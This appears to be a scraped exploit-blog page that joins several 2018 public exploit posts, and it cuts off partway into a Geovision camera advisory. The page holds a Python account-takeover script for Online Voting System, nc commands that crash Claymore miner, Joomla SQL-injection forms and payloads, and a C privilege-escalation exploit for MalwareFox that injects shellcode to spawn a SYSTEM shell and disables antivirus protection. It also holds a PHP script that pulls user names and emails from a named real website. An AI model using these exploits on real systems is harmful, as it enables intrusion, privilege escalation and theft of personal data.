# Exploit Title: Online Voting System - Authentication Bypass
# Date: 02.02.2018
# Vendor Homepage: http://themashabrand.com
# Software Link: http://themashabrand.com/p/votin
# Demo: http://localhost/Onlinevoting
# Version: 1.0
# Category: Webapps
# Exploit Author: Giulio Comi
# CVE : CVE-2018-6180
#Description
A flaw in the profile section of Online Voting System allows an unauthenticated user to set an arbitrary password for accounts registered in the application.
The application does not check the validity of the session cookie and updates the password and other fields of a user based on an incremental identifier and without requiring the current valid password for target account.
# Proof of Concept:
#!/usr/bin/env python
import requests
from time import sleep
from lxml import html
def own(auth_bypass_request):
"""
Reset the password of a user just knowing his id
"""
url_edit_password = "admin/profile.php"
payload = {
'id': 1,
'admin': 'admin', # overwrite the username of the victim
'password': "ARBITRARY_PASSWORD", # overwrite the password of the victim
'edit': ''
}
response = auth_bypass_request.post(target_site + url_edit_password, data=payload)
# Parse response to check if the request was successful
check_result = html.fromstring(response).xpath('//div[@class="alert alert-success"]//p//strong/text()')
return(lambda: False, lambda: True)[str(check_result).find('Successfully') > -1]()
def login(login_request):
"""
Enjoy the new password chosen for the victim
"""
credentials = {'username': 'admin',
'password': "ARBITRARY_PASSWORD",
'usertype': 'admin',
'login': ''
}
response = login_request.post(target_site, data=credentials)
print(response.text)
if __name__ == "__main__":
target_site = "http://localhost/Onlinevoting/"
request = requests.Session()
if own(request):
sleep(4) # just a bit of delay
login(request)
else:
print('Maybe the given id is not registered in the application')
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863559433
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
Claymore’s Dual GPU Miner 10.5 and below is vulnerable to a format strings vulnerability. This allows an unauthenticated attacker to read memory addresses, or immediately terminate the mining process causing a denial of service.
After reading about the recent vulnerabilities with previous versions, I thought I should take another look at the json listener on port 3333 and see if there was any avenues of attack.
echo -e '{"id":1,"jsonrpc":"1.0","method":"test"}' | nc 192.168.1.107 3333 & printf "\n"
After realizing the buffer was printed I decided to try a few others…
Sending %s does return some strings, however I couldn’t get the hex addresses padded properly to dig in more as I kept getting unable to parse json errors. Sending %p also did yield some results but I’m sure someone more qualified may be able to exploit the stack further…
Finally, sending %n completely kills the mining process.
echo -e '{"id":1,"jsonrpc":"1.0","method":"%n"}' | nc 192.168.1.139 3333 & printf "\n"
Keep your rigs up to date, or stop opening port 3333 to the public. Seriously.
Timeline
01/26/18 — Reported
01/26/18 —Confirmed and immediately patched. 10.6 released request for 3–4 day embargo
01/31/18 — Public Disclosure
<!--
# # # # #
# Exploit Title: Joomla! Component Zh GoogleMap 8.4.0.0 - SQL Injection
# Dork: N/A
# Date: 04.02.2018
# Vendor Homepage: http://zhuk.cc/
# Software Link: https://extensions.joomla.org/extensions/extension/maps-a-weather/maps-a-locations/zh-googlemap/
# Software Download: http://zhuk.cc/files/pkg_zhgooglemap-j30-8.4.0.0-final.zip
# Version: 8.4.0.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-6582
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# Want To Donate ?
# BTC : 1NGEp2eNWRCE6gp2i31UPN6G6KBzMDdCyZ
# ETH : 0xd606c6b86a1b88c7fcc1f58f7659cfd968449cf2
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# # # # #
-->
<html>
<body>
<!--com_zhgooglemap/controller.php-->
<!--# 1)-->
<!--L 30: public function getPlacemarkDetails() {........}-->
<form action="http://localhost/[PATH]/index.php?option=com_zhgooglemap&no_html=1&format=raw&task=getPlacemarkDetails" method="post">
<input name="id" value="-11 UNION ALL SELECT 11,11,11,11,11,11,11,11,CONCAT((SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e116f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR%1,4,0x30),0x3a20,table_name,0x3c62723e))))x)),11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11--" type="hidden">
<input type="submit" value="1-Ver Ayari">
</form>
<!--# 2)-->
<!--L 363: public function getPlacemarkHoverText() {........}-->
<form action="http://localhost/[PATH]/index.php?option=com_zhgooglemap&no_html=1&format=raw&task=getPlacemarkHoverText" method="post">
<input name="id" value="-22 UNION ALL SELECT 22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,CONCAT((SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e116f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR%1,4,0x30),0x3a20,table_name,0x3c62723e))))x)),22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22--" type="hidden">
<input type="submit" value="2-Ver Ayari">
</form>
<!--# 3)-->
<!--L 418: public function getPathHoverText() {........}-->
<form action="http://localhost/[PATH]/index.php?option=com_zhgooglemap&no_html=1&format=raw&task=getPathHoverText" method="post">
<input name="id" value="-33 UNION ALL SELECT 33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,CONCAT((SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e336f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR%1,4,0x30),0x3a20,table_name,0x3c62723e))))x)),33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33--" type="hidden">
<input type="submit" value="3-Ver Ayari">
</form>
<!--# 4)-->
<!--L 763: public function getPathDetails() {........}-->
<form action="http://localhost/[PATH]/index.php?option=com_zhgooglemap&no_html=1&format=raw&task=getPathDetails" method="post">
<input name="id" value="-44 UNION ALL SELECT 44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,CONCAT((SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e116f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR%1,4,0x30),0x3a20,table_name,0x3c62723e))))x)),44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44--" type="hidden">
<input type="submit" value="4-Ver Ayari">
</form>
</body>
</html>
<!--
# # # # #
# Exploit Title: Joomla! Component Zh BaiduMap 3.0.0.1 - SQL Injection
# Dork: N/A
# Date: 04.02.2018
# Vendor Homepage: http://zhuk.cc/
# Software Link: https://extensions.joomla.org/extensions/extension/maps-a-weather/maps-a-locations/zh-baidumap/
# Software Download: http://zhuk.cc/files/pkg_zhbaidumap-j30-3.0.0.1-final.zip
# Version: 3.0.0.1
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-6605
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# Want To Donate ?
# BTC : 1NGEp2eNWRCE6gp2i31UPN6G6KBzMDdCyZ
# ETH : 0xd606c6b86a1b88c7fcc1f58f7659cfd968449cf2
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# # # # #
-->
<html>
<body>
<!--com_zhbaidumap/controller.php-->
<!--# 1)-->
<!--L 27: public function getPlacemarkDetails() {........}-->
<form action="http://localhost/[PATH]/index.php?option=com_zhbaidumap&no_html=1&format=raw&task=getPlacemarkDetails" method="post">
<input name="id" value="-11 UNION ALL SELECT 11,11,11,11,11,11,11,11,/*!01111CONCAT*/((/*!01111SELECT*/(@x)/*!01111FROM*/(/*!01111SELECT*/(@x:=0x00),(@NR:=0),(/*!01111SELECT*/(0)/*!01111FROM*/(INFORMATION_SCHEMA.TABLES)/*!01111WHERE*/(TABLE_SCHEMA!=0x696e116f726d6174696f6e5f736368656d61)/*!01111AND*/(0x00)IN(@x:=/*!01111CONCAT*/(@x,/*!01111LPAD*/(@NR:=@NR%1,4,0x30),0x3a20,table_name,0x3c62723e))))x)),11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11--" type="hidden">
<input type="submit" value="1-Ver Ayari">
</form>
<!--# 2)-->
<!--L 356: public function getPlacemarkHoverText() {........}-->
<form action="http://localhost/Joomla375/index.php?option=com_zhbaidumap&no_html=1&format=raw&task=getPlacemarkHoverText" method="post">
<input name="id" value="-22 UNION ALL SELECT 22,22,22,22,22,22,22,22,/*!02222CONCAT*/((/*!02222SELECT*/(@x)/*!02222FROM*/(/*!02222SELECT*/(@x:=0x00),(@NR:=0),(/*!02222SELECT*/(0)/*!02222FROM*/(INFORMATION_SCHEMA.TABLES)/*!02222WHERE*/(TABLE_SCHEMA!=0x696e226f726d6174696f6e5f736368656d61)/*!02222AND*/(0x00)IN(@x:=/*!02222CONCAT*/(@x,/*!02222LPAD*/(@NR:=@NR%1,4,0x30),0x3a20,table_name,0x3c62723e))))x)),22,22--" type="hidden">
<input type="submit" value="2-Ver Ayari">
</form>
<!--# 3)-->
<!--L 411: public function getPathHoverText() {........}-->
<form action="http://localhost/[PATH]/index.php?option=com_zhbaidumap&no_html=1&format=raw&task=getPathHoverText" method="post">
<input name="id" value="-33 UNION ALL SELECT 33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,/*!03333CONCAT*/((/*!03333SELECT*/(@x)/*!03333FROM*/(/*!03333SELECT*/(@x:=0x00),(@NR:=0),(/*!03333SELECT*/(0)/*!03333FROM*/(INFORMATION_SCHEMA.TABLES)/*!03333WHERE*/(TABLE_SCHEMA!=0x696e116f726d6174696f6e5f736368656d61)/*!03333AND*/(0x00)IN(@x:=/*!03333CONCAT*/(@x,/*!03333LPAD*/(@NR:=@NR%1,4,0x30),0x3a20,table_name,0x3c62723e))))x)),33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33--" type="hidden">
<input type="submit" value="3-Ver Ayari">
</form>
<!--# 4)-->
<!--L 756: public function getPathDetails() {........}-->
<form action="http://localhost/[PATH]/index.php?option=com_zhbaidumap&no_html=1&format=raw&task=getPathDetails" method="post">
<input name="id" value="-44 UNION ALL SELECT 44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,/*!04444CONCAT*/((/*!04444SELECT*/(@x)/*!04444FROM*/(/*!04444SELECT*/(@x:=0x00),(@NR:=0),(/*!04444SELECT*/(0)/*!04444FROM*/(INFORMATION_SCHEMA.TABLES)/*!04444WHERE*/(TABLE_SCHEMA!=0x696e116f726d6174696f6e5f736368656d61)/*!04444AND*/(0x00)IN(@x:=/*!04444CONCAT*/(@x,/*!04444LPAD*/(@NR:=@NR%1,4,0x30),0x3a20,table_name,0x3c62723e))))x)),44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44--" type="hidden">
<input type="submit" value="4-Ver Ayari">
</form>
</body>
</html>
<!--
# # # # #
# Exploit Title: Joomla! Component Zh YandexMap 6.2.1.0 - SQL Injection
# Dork: N/A
# Date: 04.02.2018
# Vendor Homepage: http://zhuk.cc/
# Software Link: https://extensions.joomla.org/extensions/extension/maps-a-weather/maps-a-locations/zh-yandexmap/
# Software Download: http://zhuk.cc/files/pkg_zhyandexmap-j30-6.2.1.0-final.zip
# Version: 6.2.1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-6604
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# Want To Donate ?
# BTC : 1NGEp2eNWRCE6gp2i31UPN6G6KBzMDdCyZ
# ETH : 0xd606c6b86a1b88c7fcc1f58f7659cfd968449cf2
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# # # # #
-->
<html>
<body>
<!--com_zhyandexmap/controller.php-->
<!--# 1)-->
<!--L 29: public function getPlacemarkDetails() {........}-->
<form action="http://localhost/[PATH]/index.php?option=com_zhyandexmap&no_html=1&format=raw&task=getPlacemarkDetails" method="post">
<input name="id" value="-11 UNION ALL SELECT 11,11,11,11,11,11,11,11,/*!01111CONCAT*/((/*!01111SELECT*/(@x)/*!01111FROM*/(/*!01111SELECT*/(@x:=0x00),(@NR:=0),(/*!01111SELECT*/(0)/*!01111FROM*/(INFORMATION_SCHEMA.TABLES)/*!01111WHERE*/(TABLE_SCHEMA!=0x696e116f726d6174696f6e5f736368656d61)/*!01111AND*/(0x00)IN(@x:=/*!01111CONCAT*/(@x,/*!01111LPAD*/(@NR:=@NR%1,4,0x30),0x3a20,table_name,0x3c62723e))))x)),11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11--" type="hidden">
<input type="submit" value="1-Ver Ayari">
</form>
</body>
</html>
/*
Title : MalwareFox AntiMalware 2.74.0.150 - Local Privilege Escalation
Date : 02/02/2018
Author : Souhail Hammou
Vendor Homepage : https://www.malwarefox.com/
Version : 2.74.0.150
Tested on : Windows 7 32-bit / Windows 10 64-bit
CVE : CVE-2018-6593
*/
#include <Windows.h>
#include <fltUser.h>
#include <TlHelp32.h>
#include <stdio.h>
#pragma comment(lib,"FltLib.lib")
BOOL RegisterProcessByCommunicationPort()
{
HRESULT hResult;
HANDLE hPort;
/*
Improper access control :
The default DACL for the filter communication port is superseded allowing everyone to connect to the port:
.text:0000000140011987 lea rcx, [rbp+SecurityDescriptor]
.text:000000014001198B mov edx, 1F0001h
.text:0000000140011990 call FltBuildDefaultSecurityDescriptor ;default SD only allows SYSTEM & Admins to connect
.text:0000000140011995 test eax, eax
[.........]
.text:00000001400119B1
.text:00000001400119B1 loc_1400119B1: ; CODE XREF: sub_140011890+107j
.text:00000001400119B1 mov rcx, [rbp+SecurityDescriptor] ; SecurityDescriptor
.text:00000001400119B5 xor r9d, r9d ; DaclDefaulted
.text:00000001400119B8 xor r8d, r8d ; Dacl
.text:00000001400119BB mov dl, 1 ; DaclPresent
.text:00000001400119BD call cs:RtlSetDaclSecurityDescriptor ; <= Vuln: SD's DACL pointer is set to NULL, granting access to everyone
Once connected to the port, the driver automatically registers the process
as trusted. This allows the process to issue IOCTL codes that couldn't be sent otherwise.
e.g. disable real-time protection, write to raw disk, open full access handles to processes ...etc
*/
hResult = FilterConnectCommunicationPort(
L"\\GLOBAL??\\ZAM_MiniFilter_CommPort",
0,
NULL,
0,
NULL,
&hPort);
if (hResult != S_OK)
{
return FALSE;
}
CloseHandle(hPort);
return TRUE;
}
DWORD GetWinlogonPID()
{
DWORD WinlogonPid = 0;
PROCESSENTRY32 ProcessEntry;
ProcessEntry.dwSize = sizeof(PROCESSENTRY32);
HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (hSnapshot == INVALID_HANDLE_VALUE)
{
printf("[-] CreateToolhelp32Snapshot failed !\n");
goto ret;
}
if (!Process32First(hSnapshot, &ProcessEntry))
{
printf("[-] Process32First failed !\n");
goto cleanup;
}
do
{
if (!lstrcmp(ProcessEntry.szExeFile, "winlogon.exe"))
{
WinlogonPid = ProcessEntry.th32ProcessID;
break;
}
} while (Process32Next(hSnapshot, &ProcessEntry));
cleanup:
CloseHandle(hSnapshot);
ret:
return WinlogonPid;
}
int main(int argc, char** argv)
{
DWORD BytesReturned;
DWORD winlogon_pid;
HANDLE winlogon_handle;
LPVOID RemoteAllocation;
HANDLE hDevice;
printf("=== MalwareFox Anti-Malware 2.74.0.150 zam64.sys Local Privilege Escalation ===\n");
printf(" Tested on Windows 10 64-bit \n");
printf(" Souhail Hammou \n\n");
printf("[*] Stage 1: Registering the process with the driver by connecting to the minifilter communication port\n");
hDevice = CreateFile
("\\\\.\\ZemanaAntiMalware",
GENERIC_READ | GENERIC_WRITE,
0,
NULL,
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL,
NULL
);
if (hDevice == INVALID_HANDLE_VALUE)
{
return 0;
}
if (!RegisterProcessByCommunicationPort())
{
printf("\t[-] Registration Failed !\n");
return 0;
}
printf("\t[+] Process registered.\n[*] Stage 2: \n");
printf("\t[+] Getting Winlogon's PID\n");
winlogon_pid = GetWinlogonPID();
if (!winlogon_pid)
{
printf("\t[-] GetWinlogonPID() failed !\n");
return 0;
}
printf("\t[+] (IOCTL) Opening a full access, user-mode accessible handle from kernel-mode to winlogon\n");
/*
The dispatcher for IOCTL code 0x8000204C opens a full access handle, accessible from usermode, to a process.
We use this IOCTL to open a full access handle to winlogon.exe.
Note that this IOCTL can only be sent if the process is registered with the driver.
*/
if (!DeviceIoControl(hDevice, 0x8000204C, &winlogon_pid, sizeof(DWORD), &winlogon_handle, sizeof(HANDLE), &BytesReturned, NULL))
{
printf("\t[-] DeviceIoControl 0x8000204C failed !\n");
return 0;
}
printf("\t[+] Allocating executable memory in winlogon.exe using the full access handle\n");
if (!(RemoteAllocation = VirtualAllocEx(winlogon_handle, NULL, 0x1000, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE)))
{
printf("\t[-] VirtualAllocEx failed !\n");
return 0;
}
printf("\t[+] Writing shellcode to allocated memory\n");
/*msfvenom -p windows/x64/exec CMD=cmd.exe EXITFUNC=thread -f c*/
unsigned char buf[] =
"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50"
"\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52"
"\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a"
"\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41"
"\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52"
"\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88\x00\x00\x00\x48"
"\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40"
"\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48"
"\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41"
"\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1"
"\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c"
"\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01"
"\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a"
"\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b"
"\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b"
"\x6f\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd"
"\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0"
"\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff"
"\xd5\x63\x6d\x64\x2e\x65\x78\x65\x00";
if (!WriteProcessMemory(winlogon_handle, RemoteAllocation, buf, sizeof(buf), &BytesReturned))
{
printf("\t[-] WriteProcessMemory Failed !\n");
return 0;
}
printf("\t[+] Spawning SYSTEM shell\n");
if (!CreateRemoteThread(winlogon_handle, NULL, 0, RemoteAllocation, NULL, 0, NULL))
{
printf("\t[-] CreateRemoteThread Failed! Did you compile the exploit as a 64-bit executable ?\n");
return 0;
}
printf("[*] Bonus:\n\t[+] Disabling real-time protection\n");
if (!DeviceIoControl(hDevice, 0x80002090, NULL, 0, NULL, 0, &BytesReturned, NULL))
{
printf("\t[-] DeviceIoControl 0x80002090 failed !\n");
return 0;
}
printf("\t[+] RT protection disabled.");
return 0;
}
<?php
# # # # #
# Exploit Title: Joomla! Component jLike 1.0 - Information Leakage
# Dork: N/A
# Date: 04.02.2018
# Vendor Homepage: http://joomlaserviceprovider.com/
# Software Link: https://extensions.joomla.org/extensions/extension/social-web/social-share/jlike/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-6610
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# Want To Donate ?
# BTC : 1NGEp2eNWRCE6gp2i31UPN6G6KBzMDdCyZ
# ETH : 0xd606c6b86a1b88c7fcc1f58f7659cfd968449cf2
# # # # #
# Description:
# Information Leakage
#
# Proof of Concept:
#
# 1)
header ('Content-type: text/html; charset=UTF-8');
$url= "http://www.projectcontrolsinstitute.com/";
$p="index.php?option=com_jlike&task=getUserByCommentId&tmpl=component&format=row";
$url = file_get_contents($url.$p);
$l = json_decode($url, true);
if($l){
echo "*-----------------------------*<br />";
foreach($l as $u){
echo "[-] ID\n\n\n\n:\n" .$u['id']."<br />";
echo "[-] Name\n\n:\n" .$u['name']."<br />";
echo "[-] Email\n:\n" .$u['email']."<br />";
echo "<br>";
}echo "*-----------------------------*";}
else{echo "[-] No user";}
?>
# # # # #
# Exploit Title: Joomla! Component JSP Tickets 1.1 - SQL Injection
# Dork: N/A
# Date: 04.02.2018
# Vendor Homepage: http://joomlaserviceprovider.com/
# Software Link: https://extensions.joomla.org/extensions/extension/clients-a-communities/help-desk/jsp-tickets/
# Version: 1.1
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-6609
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# Want To Donate ?
# BTC : 1NGEp2eNWRCE6gp2i31UPN6G6KBzMDdCyZ
# ETH : 0xd606c6b86a1b88c7fcc1f58f7659cfd968449cf2
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# 1)
# http://localhost/[PATH]/index.php?option=com_jsptickets&controller=ticketlist&task=edit&ticketcode=[SQL]
#
# -66' /*!07777UNION*/ /*!07777SELECT*/ nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,/*!07777CONCAT*/((/*!07777SELECT*/+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+/*!07777FROM*/+INFORMATION_SCHEMA.TABLES+/*!07777WHERE*/+TABLE_SCHEMA=DATABASE())),nUlL,nUlL,nUlL,nUlL--+VerAyari
#
# Parameter: ticketcode (GET)
# Type: boolean-based blind
# Title: AND boolean-based blind - WHERE or HAVING clause
# Payload: option=com_jsptickets&controller=ticketlist&task=edit&ticketcode=5a71d319e86c1' AND 5298=5298 AND 'okLe'='okLe
#
# Type: error-based
# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
# Payload: option=com_jsptickets&controller=ticketlist&task=edit&ticketcode=5a71d319e86c1' AND (SELECT 8072 FROM(SELECT COUNT(*),CONCAT(0x717a6a7871,(SELECT (ELT(8072=8072,1))),0x717a706a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'FwvD'='FwvD
#
# Type: AND/OR time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind
# Payload: option=com_jsptickets&controller=ticketlist&task=edit&ticketcode=5a71d319e86c1' AND SLEEP(5) AND 'Ozir'='Ozir
#
# Type: UNION query
# Title: Generic UNION query (NULL) - 29 columns
# Payload: option=com_jsptickets&controller=ticketlist&task=edit&ticketcode=-4507' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a6a7871,0x72476c507a64564861484f575645536355695958564f4c4e6858625061774a6b59796b6571746249,0x717a706a71),NULL,NULL,NULL,NULL-- fcOG
# 2)
# http://localhost/[PATH]/index.php?option=com_jsptickets&controller=statuslist&task=edit&id=[SQL]
#
# 66 AND (SELECT 66 FROM(SELECT COUNT(*),CONCAT(CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(SELECT (ELT(66=66,1))),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
#
#
# Parameter: id (GET)
# Type: boolean-based blind
# Title: AND boolean-based blind - WHERE or HAVING clause
# Payload: option=com_jsptickets&controller=statuslist&task=edit&id=4 AND 6325=6325
#
# Type: error-based
# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
# Payload: option=com_jsptickets&controller=statuslist&task=edit&id=4 AND (SELECT 4097 FROM(SELECT COUNT(*),CONCAT(0x71716a7a71,(SELECT (ELT(4097=4097,1))),0x717a707a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
#
# Type: AND/OR time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind
# Payload: option=com_jsptickets&controller=statuslist&task=edit&id=4 AND SLEEP(5)
#
# 3)
# http://localhost/[PATH]/index.php?option=com_jsptickets&controller=prioritylist&task=edit&id=[SQL]
#
# 66 AND (SELECT 66 FROM(SELECT COUNT(*),CONCAT(CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(SELECT (ELT(66=66,1))),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
#
# Parameter: id (GET)
# Type: boolean-based blind
# Title: AND boolean-based blind - WHERE or HAVING clause
# Payload: option=com_jsptickets&controller=prioritylist&task=edit&id=1 AND 9454=9454
#
# Type: error-based
# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
# Payload: option=com_jsptickets&controller=prioritylist&task=edit&id=1 AND (SELECT 1045 FROM(SELECT COUNT(*),CONCAT(0x7170716a71,(SELECT (ELT(1045=1045,1))),0x716b6a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
#
# Type: AND/OR time-based blind
# Title: MySQL >= 5.0.12 OR time-based blind
# Payload: option=com_jsptickets&controller=prioritylist&task=edit&id=1 OR SLEEP(5)
#
# 4)
#
# <form method="post" action="http://localhost/[PATH]/index.php?option=com_jsptickets&controller=ticketlist&task=display">
# <input type="text" name="jform[guestemail]"...
# <input type="text" name="jform[ticketid]"...
# <input type="submit" name="searchsubmit"...
# </form>
#
# # # # #
[STX]
Subject: Geovision Inc. IP Camera/Video/Access Control Multiple Remote Command Execution - Multiple Stack Overflow - Double free - Unauthorized Access
Attack vector: Remote
Authentication: Anonymous (no credentials needed)
Researcher: bashis <mcw noemail eu> (November 2017)
PoC: https://github.com/mcw0/PoC
Python PoC: https://github.com/mcw0/PoC/blob/master/Geovision-PoC.py
Release date: February 1, 2018
Full Disclosure: 90 days
Vendor URL: http://www.geovision.com.tw/
Updated FW: http://www.geovision.com.tw/download/product/
heap: Executable + Non-ASLR
stack: Executable + ASLR
Vulnerable:
Practically more or less all models and versions with FW before November/December 2017 of Geovision embedded IP devices suffer from one or more of these vulnerabilities.
Verified:
GV-BX1500 v3.10 2016-12-02
GV-MFD1501 v3.12 2017-06-19
Timeline:
